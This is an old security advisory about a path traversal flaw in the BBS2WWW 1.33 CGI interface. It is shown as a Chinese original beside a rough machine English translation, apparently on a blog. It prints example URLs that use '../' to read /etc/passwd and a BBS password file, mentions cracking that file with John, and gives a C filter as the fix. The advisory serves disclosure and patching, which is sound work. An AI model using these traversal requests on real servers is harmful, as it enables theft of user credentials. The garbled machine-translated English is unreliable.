Author: Sinbad
Web: http://sinbad.dhs.org Web: http://sinbad.dhs.org
Introducton Introducton
-------------- --------------
BBS2WWW是上海交大计算机应用工作室(http://cas.tsx.org/)专为Firebird BBS开发的WWW界面,它使得用户不必telnet登录到BBS中就可以使用BBS的各项功能。 BBS2WWW Shanghai Jiaotong University Computer Studio (http://cas.tsx.org/) developed specifically for Firebird BBS WWW interface, which enables users do not have telnet to the BBS BBS can use the various functions.
BBS2WWW 1.33版本中CGI函数存在一个缺陷,如果提交的链接中某些变量包含"../"字符串,远程用户就可能获取任何文件(以Web Server身份)的内容,也可以浏览有访问权限的目录。 BBS2WWW 1.33 version of the function of CGI there is a defect, if the submitted link some of the variables included "../" string, a remote user may obtain any documents (identity to Web Server) content, you can also have access to browse the directory.
另外,如果用户修改变量试图查看不存在的文件,将会泄漏bbs系统在硬盘上的物理路径。 In addition, if the user attempts to modify the variable View the file does not exist, it will spill bbs system, the physical path on your hard disk.
Description Description
------------------ ------------------
1. 泄漏BBS系统的物理路径 1 BBS system of physical leakage path
http://bbs.victim.edu.cn/cgi-bin/bbscon?board=sysop&file=M.971439268 http://bbs.victim.edu.cn/cgi-bin/bbscon?board=sysop&file=M.971439268
将返回: Will return:
Error in opening file /home1/hhfeng/bbs/home/boards/sysop/M.971439268 Error in opening file / home1/hhfeng/bbs/home/boards/sysop/M.971439268
2. 查看系统文件 (2) view the system files
http://bbs.victim.edu.cn/cgi-bin/bbscon?board=sysop&file=../../../../../../etc/p http://bbs.victim.edu.cn/cgi-bin/bbscon?board=sysop&file=../../../../../../etc/p
asswd asswd
http://bbs.victim.edu.cn/cgi-bin/bbscon?board=sysop&file=../../../../../../home1 http://bbs.victim.edu.cn/cgi-bin/bbscon?board=sysop&file=../../../../../../home1
/hhfeng/bbs/home/.PASSWDS / Hhfeng / bbs / home / .PASSWDS
.PASSWDS文件保存了BBS系统中用户的账号、密码等信息,如果被下载,可以用John进行暴力破解。 . PASSWDS file a BBS system in the user's account, password and other information, if it is downloaded, you can brute-force with John.
Solutions Solutions
--------------- ---------------
在拆分Name/Value对的CGI库函数部分,加上以下内容: In the Split Name / Value part of the CGI library, plus the following:
if (strstr (cgi_entries[i].value, "..") != NULL if (strstr (cgi_entries [i]. value, "..")! = NULL
&& strstr (cgi_entries[i].name, "passwd") == NULL & & Strstr (cgi_entries [i]. Name, "passwd") == NULL
&& strstr (cgi_entries[i].name, "title") == NULL & & Strstr (cgi_entries [i]. Name, "title") == NULL
&& strstr (cgi_entries[i].name, "text") == NULL ) & & Strstr (cgi_entries [i]. Name, "text") == NULL)
show_error ("Error input!"); show_error ("Error input!");
即除了用户密码、文章标题和文章内容,其它输入均需要过滤".."字符串。 That in addition to the user password, the article title and article content, and other inputs are required filter ".." string.
国内很多高校BBS2WWW仍使用1.33或者以前的版本,请尽快修补或者升级到1.34版本。 Many domestic colleges and universities BBS2WWW still use version 1.33 or earlier, as soon as possible repair, or upgrade to version 1.34.
Tidak ada komentar:
Posting Komentar